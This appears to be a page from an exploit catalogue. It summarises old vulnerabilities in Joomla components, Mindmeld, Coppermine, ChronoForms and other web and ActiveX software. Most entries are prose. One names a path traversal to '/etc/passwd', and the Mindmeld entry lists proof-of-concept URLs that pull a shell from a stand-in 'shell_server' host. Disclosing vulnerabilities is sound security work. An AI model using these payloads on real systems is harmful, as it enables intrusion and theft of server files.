header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

Joomla SQL Injection (com_catalogshop)

An attacker can exploit a SQL injection vulnerability in the com_catalogshop component of Joomla! to execute arbitrary SQL commands. The vulnerability is due to insufficient sanitization of user-supplied input to the 'id' parameter of the 'index.php' script when 'func' is set to 'detail'. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL commands to the vulnerable script. Successful exploitation could result in unauthorized access to sensitive information in the back-end database.

Joomla SQL Injection (com_akogallery)

An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. The attacker can inject arbitrary SQL code in the vulnerable parameter 'id' of the 'index.php' script. This can be used to extract data from the database, modify data, delete data, or even execute commands on the operating system.

Chilkat FTP ActiveX 2.0 (ChilkatCert.dll) Insecure Method

A vulnerability exists in Chilkat FTP ActiveX 2.0 (ChilkatCert.dll) which allows an attacker to write arbitrary files to the system. This is due to the insecure use of the SavePkcs8File method which allows an attacker to write arbitrary files to the system.

sflog! 0.96 remote file disclosure vulnerabilities

Sflog! 0.96 is vulnerable to remote file disclosure. An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable server. The request should contain a malicious URL with the ‘blog’ and ‘permalink’ parameters set to ‘../../../../../../../../../../etc/passwd’. This will allow the attacker to view the contents of the ‘/etc/passwd’ file.

Mindmeld Remote File Inclusion Vulnerabilities

Mindmeld is an enterprise-capable knowledge-sharing system written in PHP. There are multiple remote file inclusion vulnerabilities in Mindmeld version 1.2.0.10 (latest version). The vulnerable files and lines are Mindmeld-1.2.0.10/acweb/admin_index.php: line 51, Mindmeld-1.2.0.10/include/ask.inc.php: line 34, Mindmeld-1.2.0.10/include/learn.inc.php: line 38, Mindmeld-1.2.0.10/include/manage.inc.php: line 31, Mindmeld-1.2.0.10/include/mind.inc.php: line 33, Mindmeld-1.2.0.10/include/sensory.inc.php: line 70. The PoC for each of these vulnerabilities is http://server/mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=http://shell_server/shell.php?, http://server/mindmeld/include/ask.inc.php?MM_GLOBALS[home]=http://shell_server/shell.php?, http://server/mindmeld/include/learn.inc.php?MM_GLOBALS[home]=http://shell_server/shell.php?, http://server/mindmeld/include/manage.inc.php?MM_GLOBALS[home]=http://shell_server/shell.php?, http://server/mindmeld/include/mind.inc.php?MM_GLOBALS[home]=http://shell_server/shell.php?, http://server/mindmeld/include/sensory.inc.php?MM_GLOBALS[home]=http://shell_server/shell.php? respectively. These vulnerabilities have been disclosed to the vendor although development on this software has been discontinued.

MySpace Uploader Buffer Overflow Exploit

This exploit is a buffer overflow vulnerability in MySpaceUploader.ocx and Aurigma ImageUploader4.ocx. It was written by e.b. and tested on Windows XP SP2 (fully patched) English, IE6. The MySpaceUploader.ocx version is 1.0.0.4 and the Aurigma ImageUploader4.ocx version is 4.5.70.0. The exploit was developed with the help of h.d.m. and the Metasploit crew.

PHP Links from DeltaScripts <= 1.3

A Remote File Inclusion (RFI) vulnerability exists in PHP Links from DeltaScripts version 1.3 and earlier. The vulnerability is due to the application including files based on user-supplied input without proper validation. An attacker can exploit this vulnerability to include arbitrary remote files, resulting in the execution of arbitrary code on the vulnerable system.

CHRONOFORMS version V2.3.5 Remote File Include Vulnerability

A vulnerability in CHRONOFORMS version V2.3.5 allows an attacker to include a remote file via the mosConfig_absolute_path parameter in the following files: /administrator/components/com_chronocontact/excelwriter/Writer.php, /administrator/components/com_chronocontact/excelwriter/PPS.php, /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php, /administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php, /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php, /administrator/components/com_chronocontact/excelwriter/Writer/Format.php, and /administrator/components/com_chronocontact/excelwriter/Writer/Parser.php.

Remote Shell Command Execution in Coppermine 1.4.14

An attacker is able to execute arbitrary shell commands with the privileges of the web server process, such as user 'nobody','apache' or 'www'. This is caused by unsanitized user-submitted POST variables 'quality', 'angle' and 'clipval' in the function 'rotateImage' in 'include/imageObjectIM.class.php'.

Recent Exploits: